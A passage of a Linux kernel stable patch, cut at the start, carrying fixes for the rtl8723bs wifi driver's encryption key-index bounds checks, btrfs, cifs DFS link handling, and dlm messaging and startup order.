+ 	if (ret)
+ 		return ret;
+ 
++	/* Add the second chip if present */
++	if (ispi->master->num_chipselect < 2)
++		return 0;
++
+ 	chip.platform_data = NULL;
+ 	chip.chip_select = 1;
+ 
+diff --git a/drivers/staging/rtl8723bs/include/rtw_security.h b/drivers/staging/rtl8723bs/include/rtw_security.h
+index a68b738584623..7587fa8885274 100644
+--- a/drivers/staging/rtl8723bs/include/rtw_security.h
++++ b/drivers/staging/rtl8723bs/include/rtw_security.h
+@@ -107,13 +107,13 @@ struct security_priv {
+ 
+ 	u32 dot118021XGrpPrivacy;	/*  This specify the privacy algthm. used for Grp key */
+ 	u32 dot118021XGrpKeyid;		/*  key id used for Grp Key (tx key index) */
+-	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID];	/*  802.1x Group Key, for inx0 and inx1 */
+-	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID];
+-	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID];
++	union Keytype	dot118021XGrpKey[BIP_MAX_KEYID + 1];	/*  802.1x Group Key, for inx0 and inx1 */
++	union Keytype	dot118021XGrptxmickey[BIP_MAX_KEYID + 1];
++	union Keytype	dot118021XGrprxmickey[BIP_MAX_KEYID + 1];
+ 	union pn48		dot11Grptxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11Grprxpn;			/*  PN48 used for Grp Key recv. */
+ 	u32 dot11wBIPKeyid;						/*  key id used for BIP Key (tx key index) */
+-	union Keytype	dot11wBIPKey[6];		/*  BIP Key, for index4 and index5 */
++	union Keytype	dot11wBIPKey[BIP_MAX_KEYID + 1];	/*  BIP Key, for index4 and index5 */
+ 	union pn48		dot11wBIPtxpn;			/*  PN48 used for Grp Key xmit. */
+ 	union pn48		dot11wBIPrxpn;			/*  PN48 used for Grp Key recv. */
+ 
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+index 6aeb169c6ebf0..5c738011322fc 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c
+@@ -350,7 +350,7 @@ int rtw_cfg80211_check_bss(struct adapter *padapter)
+ 	bss = cfg80211_get_bss(padapter->rtw_wdev->wiphy, notify_channel,
+ 			pnetwork->mac_address, pnetwork->ssid.ssid,
+ 			pnetwork->ssid.ssid_length,
+-			WLAN_CAPABILITY_ESS, WLAN_CAPABILITY_ESS);
++			IEEE80211_BSS_TYPE_ANY, IEEE80211_PRIVACY_ANY);
+ 
+ 	cfg80211_put_bss(padapter->rtw_wdev->wiphy, bss);
+ 
+@@ -711,6 +711,7 @@ exit:
+ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+ 	struct mlme_priv *pmlmepriv = &padapter->mlmepriv;
+@@ -724,26 +725,29 @@ static int rtw_cfg80211_set_encryption(struct net_device *dev, struct ieee_param
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS
+-			|| param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
+ 		ret = -EINVAL;
+ 		goto exit;
+ 	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if ((wep_key_idx >= WEP_KEYS) || (wep_key_len <= 0)) {
++		if (wep_key_len <= 0) {
+ 			ret = -EINVAL;
+ 			goto exit;
+ 		}
+@@ -1135,8 +1139,8 @@ void rtw_cfg80211_unlink_bss(struct adapter *padapter, struct wlan_network *pnet
+ 
+ 	bss = cfg80211_get_bss(wiphy, NULL/*notify_channel*/,
+ 		select_network->mac_address, select_network->ssid.ssid,
+-		select_network->ssid.ssid_length, 0/*WLAN_CAPABILITY_ESS*/,
+-		0/*WLAN_CAPABILITY_ESS*/);
++		select_network->ssid.ssid_length, IEEE80211_BSS_TYPE_ANY,
++		IEEE80211_PRIVACY_ANY);
+ 
+ 	if (bss) {
+ 		cfg80211_unlink_bss(wiphy, bss);
+diff --git a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+index 30374a820496e..40a3157fb7359 100644
+--- a/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
++++ b/drivers/staging/rtl8723bs/os_dep/ioctl_linux.c
+@@ -46,6 +46,7 @@ static int wpa_set_auth_algs(struct net_device *dev, u32 value)
+ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param, u32 param_len)
+ {
+ 	int ret = 0;
++	u8 max_idx;
+ 	u32 wep_key_idx, wep_key_len, wep_total_len;
+ 	struct ndis_802_11_wep	 *pwep = NULL;
+ 	struct adapter *padapter = rtw_netdev_priv(dev);
+@@ -60,19 +61,22 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		goto exit;
+ 	}
+ 
+-	if (param->sta_addr[0] == 0xff && param->sta_addr[1] == 0xff &&
+-	    param->sta_addr[2] == 0xff && param->sta_addr[3] == 0xff &&
+-	    param->sta_addr[4] == 0xff && param->sta_addr[5] == 0xff) {
+-		if (param->u.crypt.idx >= WEP_KEYS ||
+-		    param->u.crypt.idx >= BIP_MAX_KEYID) {
+-			ret = -EINVAL;
+-			goto exit;
+-		}
+-	} else {
+-		{
+-			ret = -EINVAL;
+-			goto exit;
+-		}
++	if (param->sta_addr[0] != 0xff || param->sta_addr[1] != 0xff ||
++	    param->sta_addr[2] != 0xff || param->sta_addr[3] != 0xff ||
++	    param->sta_addr[4] != 0xff || param->sta_addr[5] != 0xff) {
++		ret = -EINVAL;
++		goto exit;
++	}
++
++	if (strcmp(param->u.crypt.alg, "WEP") == 0)
++		max_idx = WEP_KEYS - 1;
++	else
++		max_idx = BIP_MAX_KEYID;
++
++	if (param->u.crypt.idx > max_idx) {
++		netdev_err(dev, "Error crypt.idx %d > %d\n", param->u.crypt.idx, max_idx);
++		ret = -EINVAL;
++		goto exit;
+ 	}
+ 
+ 	if (strcmp(param->u.crypt.alg, "WEP") == 0) {
+@@ -84,9 +88,6 @@ static int wpa_set_encryption(struct net_device *dev, struct ieee_param *param,
+ 		wep_key_idx = param->u.crypt.idx;
+ 		wep_key_len = param->u.crypt.key_len;
+ 
+-		if (wep_key_idx > WEP_KEYS)
+-			return -EINVAL;
+-
+ 		if (wep_key_len > 0) {
+ 			wep_key_len = wep_key_len <= 5 ? 5 : 13;
+ 			wep_total_len = wep_key_len + FIELD_OFFSET(struct ndis_802_11_wep, key_material);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index deebc8ddbd932..4b69945755e4f 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1616,7 +1616,8 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 
+ 		btrfs_info(fs_info,
+ 			"reclaiming chunk %llu with %llu%% used %llu%% unusable",
+-				bg->start, div_u64(bg->used * 100, bg->length),
++				bg->start,
++				div64_u64(bg->used * 100, bg->length),
+ 				div64_u64(zone_unusable * 100, bg->length));
+ 		trace_btrfs_reclaim_block_group(bg);
+ 		ret = btrfs_relocate_chunk(fs_info, bg->start);
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 6092a4eedc923..b8ae02aa632e3 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -760,7 +760,13 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 			goto next;
+ 		}
+ 
++		flags = em->flags;
+ 		clear_bit(EXTENT_FLAG_PINNED, &em->flags);
++		/*
++		 * In case we split the extent map, we want to preserve the
++		 * EXTENT_FLAG_LOGGING flag on our extent map, but we don't want
++		 * it on the new extent maps.
++		 */
+ 		clear_bit(EXTENT_FLAG_LOGGING, &flags);
+ 		modified = !list_empty(&em->list);
+ 
+@@ -771,7 +777,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 		if (em->start >= start && em_end <= end)
+ 			goto remove_em;
+ 
+-		flags = em->flags;
+ 		gen = em->generation;
+ 		compressed = test_bit(EXTENT_FLAG_COMPRESSED, &em->flags);
+ 
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 05f9cbbf6e1ef..f02b8cbd6ec41 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -6739,7 +6739,7 @@ static void btrfs_log_dev_io_error(struct bio *bio, struct btrfs_device *dev)
+ 
+ 	if (btrfs_op(bio) == BTRFS_MAP_WRITE)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_WRITE_ERRS);
+-	if (!(bio->bi_opf & REQ_RAHEAD))
++	else if (!(bio->bi_opf & REQ_RAHEAD))
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_READ_ERRS);
+ 	if (bio->bi_opf & REQ_PREFLUSH)
+ 		btrfs_dev_stat_inc_and_print(dev, BTRFS_DEV_STAT_FLUSH_ERRS);
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index eb1a0de9dd553..bc4475f6c0827 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -664,11 +664,21 @@ static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+ int match_target_ip(struct TCP_Server_Info *server,
+ 		    const char *share, size_t share_len,
+ 		    bool *result);
+-
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *dfs_link_path);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
+ #endif
+ 
+ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 062175994e879..4e54736a06996 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -21,6 +21,7 @@
+ #include "cifsfs.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
++#include "dfs_cache.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -1314,4 +1315,70 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with
++ * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
++ * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
++ * non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
++	 * to get a referral to figure out whether it is an DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end filling all the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
+ #endif
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index e1491440e8f1f..442718cf61b86 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -511,12 +511,13 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			 struct cifs_sb_info *cifs_sb, const char *full_path,
+ 			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+ {
+-	int rc;
+ 	__u32 create_options = 0;
+ 	struct cifsFileInfo *cfile;
+ 	struct cached_fid *cfid = NULL;
+ 	struct kvec err_iov[3] = {};
+ 	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
+ 
+ 	*adjust_tz = false;
+ 	*reparse = false;
+@@ -563,15 +564,15 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 					      create_options, ACL_NO_MODE, data,
+ 					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
+ 			goto out;
+-		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			/*
+-			 * Handle weird Windows SMB server behaviour. It responds with
+-			 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-			 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-			 * where <dfsname> contains non-ASCII unicode symbols.
+-			 */
+-			rc = -EREMOTE;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
+ 		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 6da495f593e17..0424876d22e5a 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -796,7 +796,6 @@ static int
+ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 			struct cifs_sb_info *cifs_sb, const char *full_path)
+ {
+-	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	int err_buftype = CIFS_NO_BUFFER;
+@@ -804,6 +803,8 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
+ 
+ 	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+ 	if (!rc) {
+@@ -833,15 +834,17 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+ 			goto out;
+-		/*
+-		 * Handle weird Windows SMB server behaviour. It responds with
+-		 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-		 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-		 * where <dfsname> contains non-ASCII unicode symbols.
+-		 */
+-		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
+-			rc = -EREMOTE;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+ 			rc = -EOPNOTSUPP;
+diff --git a/fs/dlm/lock.c b/fs/dlm/lock.c
+index 94a72ede57646..0b1bc24536ceb 100644
+--- a/fs/dlm/lock.c
++++ b/fs/dlm/lock.c
+@@ -3611,9 +3611,10 @@ static int create_message(struct dlm_rsb *r, struct dlm_lkb *lkb,
+ /* further lowcomms enhancements or alternate implementations may make
+    the return value from this function useful at some point */
+ 
+-static int send_message(struct dlm_mhandle *mh, struct dlm_message *ms)
++static int send_message(struct dlm_mhandle *mh, struct dlm_message *ms,
++			const void *name, int namelen)
+ {
+-	dlm_midcomms_commit_mhandle(mh);
++	dlm_midcomms_commit_mhandle(mh, name, namelen);
+ 	return 0;
+ }
+ 
+@@ -3679,7 +3680,7 @@ static int send_common(struct dlm_rsb *r, struct dlm_lkb *lkb, int mstype)
+ 
+ 	send_args(r, lkb, ms);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+ 	if (error)
+ 		goto fail;
+ 	return 0;
+@@ -3742,7 +3743,7 @@ static int send_grant(struct dlm_rsb *r, struct dlm_lkb *lkb)
+ 
+ 	ms->m_result = 0;
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3763,7 +3764,7 @@ static int send_bast(struct dlm_rsb *r, struct dlm_lkb *lkb, int mode)
+ 
+ 	ms->m_bastmode = cpu_to_le32(mode);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3786,7 +3787,7 @@ static int send_lookup(struct dlm_rsb *r, struct dlm_lkb *lkb)
+ 
+ 	send_args(r, lkb, ms);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+ 	if (error)
+ 		goto fail;
+ 	return 0;
+@@ -3811,7 +3812,7 @@ static int send_remove(struct dlm_rsb *r)
+ 	memcpy(ms->m_extra, r->res_name, r->res_length);
+ 	ms->m_hash = cpu_to_le32(r->res_hash);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3833,7 +3834,7 @@ static int send_common_reply(struct dlm_rsb *r, struct dlm_lkb *lkb,
+ 
+ 	ms->m_result = cpu_to_le32(to_dlm_errno(rv));
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, r->res_name, r->res_length);
+  out:
+ 	return error;
+ }
+@@ -3874,7 +3875,7 @@ static int send_lookup_reply(struct dlm_ls *ls, struct dlm_message *ms_in,
+ 	ms->m_result = cpu_to_le32(to_dlm_errno(rv));
+ 	ms->m_nodeid = cpu_to_le32(ret_nodeid);
+ 
+-	error = send_message(mh, ms);
++	error = send_message(mh, ms, ms_in->m_extra, receive_extralen(ms_in));
+  out:
+ 	return error;
+ }
+@@ -4044,66 +4045,6 @@ out:
+ 	return error;
+ }
+ 
+-static void send_repeat_remove(struct dlm_ls *ls, char *ms_name, int len)
+-{
+-	char name[DLM_RESNAME_MAXLEN + 1];
+-	struct dlm_message *ms;
+-	struct dlm_mhandle *mh;
+-	struct dlm_rsb *r;
+-	uint32_t hash, b;
+-	int rv, dir_nodeid;
+-
+-	memset(name, 0, sizeof(name));
+-	memcpy(name, ms_name, len);
+-
+-	hash = jhash(name, len, 0);
+-	b = hash & (ls->ls_rsbtbl_size - 1);
+-
+-	dir_nodeid = dlm_hash2nodeid(ls, hash);
+-
+-	log_error(ls, "send_repeat_remove dir %d %s", dir_nodeid, name);
+-
+-	spin_lock(&ls->ls_rsbtbl[b].lock);
+-	rv = dlm_search_rsb_tree(&ls->ls_rsbtbl[b].keep, name, len, &r);
+-	if (!rv) {
+-		spin_unlock(&ls->ls_rsbtbl[b].lock);
+-		log_error(ls, "repeat_remove on keep %s", name);
+-		return;
+-	}
+-
+-	rv = dlm_search_rsb_tree(&ls->ls_rsbtbl[b].toss, name, len, &r);
+-	if (!rv) {
+-		spin_unlock(&ls->ls_rsbtbl[b].lock);
+-		log_error(ls, "repeat_remove on toss %s", name);
+-		return;
+-	}
+-
+-	/* use ls->remove_name2 to avoid conflict with shrink? */
+-
+-	spin_lock(&ls->ls_remove_spin);
+-	ls->ls_remove_len = len;
+-	memcpy(ls->ls_remove_name, name, DLM_RESNAME_MAXLEN);
+-	spin_unlock(&ls->ls_remove_spin);
+-	spin_unlock(&ls->ls_rsbtbl[b].lock);
+-
+-	rv = _create_message(ls, sizeof(struct dlm_message) + len,
+-			     dir_nodeid, DLM_MSG_REMOVE, &ms, &mh);
+-	if (rv)
+-		goto out;
+-
+-	memcpy(ms->m_extra, name, len);
+-	ms->m_hash = cpu_to_le32(hash);
+-
+-	send_message(mh, ms);
+-
+-out:
+-	spin_lock(&ls->ls_remove_spin);
+-	ls->ls_remove_len = 0;
+-	memset(ls->ls_remove_name, 0, DLM_RESNAME_MAXLEN);
+-	spin_unlock(&ls->ls_remove_spin);
+-	wake_up(&ls->ls_remove_wait);
+-}
+-
+ static int receive_request(struct dlm_ls *ls, struct dlm_message *ms)
+ {
+ 	struct dlm_lkb *lkb;
+@@ -4173,25 +4114,11 @@ static int receive_request(struct dlm_ls *ls, struct dlm_message *ms)
+ 	   ENOTBLK request failures when the lookup reply designating us
+ 	   as master is delayed. */
+ 
+-	/* We could repeatedly return -EBADR here if our send_remove() is
+-	   delayed in being sent/arriving/being processed on the dir node.
+-	   Another node would repeatedly lookup up the master, and the dir
+-	   node would continue returning our nodeid until our send_remove
+-	   took effect.
+-
+-	   We send another remove message in case our previous send_remove
+-	   was lost/ignored/missed somehow. */
+-
+ 	if (error != -ENOTBLK) {
+ 		log_limit(ls, "receive_request %x from %d %d",
+ 			  le32_to_cpu(ms->m_lkid), from_nodeid, error);
+ 	}
+ 
+-	if (namelen && error == -EBADR) {
+-		send_repeat_remove(ls, ms->m_extra, namelen);
+-		msleep(1000);
+-	}
+-
+ 	setup_stub_lkb(ls, ms);
+ 	send_request_reply(&ls->ls_stub_rsb, &ls->ls_stub_lkb, error);
+ 	return error;
+@@ -6374,7 +6301,7 @@ static int send_purge(struct dlm_ls *ls, int nodeid, int pid)
+ 	ms->m_nodeid = cpu_to_le32(nodeid);
+ 	ms->m_pid = cpu_to_le32(pid);
+ 
+-	return send_message(mh, ms);
++	return send_message(mh, ms, NULL, 0);
+ }
+ 
+ int dlm_user_purge(struct dlm_ls *ls, struct dlm_user_proc *proc,
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index bae050df7abff..7b29ea7bfb416 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -17,7 +17,6 @@
+ #include "recoverd.h"
+ #include "dir.h"
+ #include "midcomms.h"
+-#include "lowcomms.h"
+ #include "config.h"
+ #include "memory.h"
+ #include "lock.h"
+@@ -382,23 +381,23 @@ static int threads_start(void)
+ {
+ 	int error;
+ 
+-	error = dlm_scand_start();
++	/* Thread for sending/receiving messages for all lockspace's */
++	error = dlm_midcomms_start();
+ 	if (error) {
+-		log_print("cannot start dlm_scand thread %d", error);
++		log_print("cannot start dlm midcomms %d", error);
+ 		goto fail;
+ 	}
+ 
+-	/* Thread for sending/receiving messages for all lockspace's */
+-	error = dlm_midcomms_start();
++	error = dlm_scand_start();
+ 	if (error) {
+-		log_print("cannot start dlm lowcomms %d", error);
+-		goto scand_fail;
++		log_print("cannot start dlm_scand thread %d", error);
++		goto midcomms_fail;
+ 	}
+ 
+ 	return 0;
+ 
+- scand_fail:
+-	dlm_scand_stop();
++ midcomms_fail:
++	dlm_midcomms_stop();
+  fail:
+ 	return error;
+ }
+@@ -726,7 +725,7 @@ static int __dlm_new_lockspace(const char *name, const char *cluster,
+ 	if (!ls_count) {
+ 		dlm_scand_stop();
+ 		dlm_midcomms_shutdown();
+-		dlm_lowcomms_stop();
++		dlm_midcomms_stop();
+ 	}
+  out:
+ 	mutex_unlock(&ls_lock);
+@@ -929,7 +928,7 @@ int dlm_release_lockspace(void *lockspace, int force)
+ 	if (!error)
+ 		ls_count--;
+ 	if (!ls_count)
+-		dlm_lowcomms_stop();
++		dlm_midcomms_stop();
+ 	mutex_unlock(&ls_lock);
+ 
+ 	return error;
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 871d4e9f49fb6..6ed09edabea0c 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1982,10 +1982,6 @@ static const struct dlm_proto_ops dlm_sctp_ops = {
+ int dlm_lowcomms_start(void)
+ {
+ 	int error = -EINVAL;
+-	int i;
+-
+-	for (i = 0; i < CONN_HASH_SIZE; i++)
+-		INIT_HLIST_HEAD(&connection_hash[i]);
+ 
+ 	init_local();
+ 	if (!dlm_local_count) {
+@@ -1994,8 +1990,6 @@ int dlm_lowcomms_start(void)
+ 		goto fail;
+ 	}
+ 
+-	INIT_WORK(&listen_con.rwork, process_listen_recv_socket);
+-
+ 	error = work_start();
+ 	if (error)
+ 		goto fail_local;
+@@ -2034,6 +2028,16 @@ fail:
+ 	return error;
+ }
+ 
++void dlm_lowcomms_init(void)
++{
++	int i;
++
++	for (i = 0; i < CONN_HASH_SIZE; i++)
++		INIT_HLIST_HEAD(&connection_hash[i]);
++
++	INIT_WORK(&listen_con.rwork, process_listen_recv_socket);
++}
++
+ void dlm_lowcomms_exit(void)
+ {
+ 	struct dlm_node_addr *na, *safe;
+diff --git a/fs/dlm/lowcomms.h b/fs/dlm/lowcomms.h
+index 29369feea9916..bbce7a18416dc 100644
+--- a/fs/dlm/lowcomms.h
++++ b/fs/dlm/lowcomms.h
+@@ -35,6 +35,7 @@ extern int dlm_allow_conn;
+ int dlm_lowcomms_start(void);
+ void dlm_lowcomms_shutdown(void);
+ void dlm_lowcomms_stop(void);
++void dlm_lowcomms_init(void);
+ void dlm_lowcomms_exit(void);
+ int dlm_lowcomms_close(int nodeid);
+ struct dlm_msg *dlm_lowcomms_new_msg(int nodeid, int len, gfp_t allocation,
+diff --git a/fs/dlm/main.c b/fs/dlm/main.c
+index 1c5be4b70ac1b..a77338be32371 100644
+--- a/fs/dlm/main.c
++++ b/fs/dlm/main.c
+@@ -17,7 +17,7 @@
+ #include "user.h"
+ #include "memory.h"
+ #include "config.h"
+-#include "lowcomms.h"
++#include "midcomms.h"
+ 
+ #define CREATE_TRACE_POINTS
+ #include <trace/events/dlm.h>
+@@ -30,6 +30,8 @@ static int __init init_dlm(void)
+ 	if (error)
+ 		goto out;
+ 
++	dlm_midcomms_init();
++
+ 	error = dlm_lockspace_init();
+ 	if (error)
+ 		goto out_mem;
+@@ -66,6 +68,7 @@ static int __init init_dlm(void)
+  out_lockspace:
+ 	dlm_lockspace_exit();
+  out_mem:
++	dlm_midcomms_exit();
+ 	dlm_memory_exit();
+  out:
+ 	return error;
+@@ -79,7 +82,7 @@ static void __exit exit_dlm(void)
+ 	dlm_config_exit();
+ 	dlm_memory_exit();
+ 	dlm_lockspace_exit();
+-	dlm_lowcomms_exit();
++	dlm_midcomms_exit();
+ 	dlm_unregister_debugfs();
+ }
+ 
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index 546c52c46b1c9..b2a25a33a1488 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -132,6 +132,7 @@
+  */
+ #define DLM_DEBUG_FENCE_TERMINATION	0
+ 
++#include <trace/events/dlm.h>
+ #include <net/tcp.h>
+ 
+ #include "dlm_internal.h"
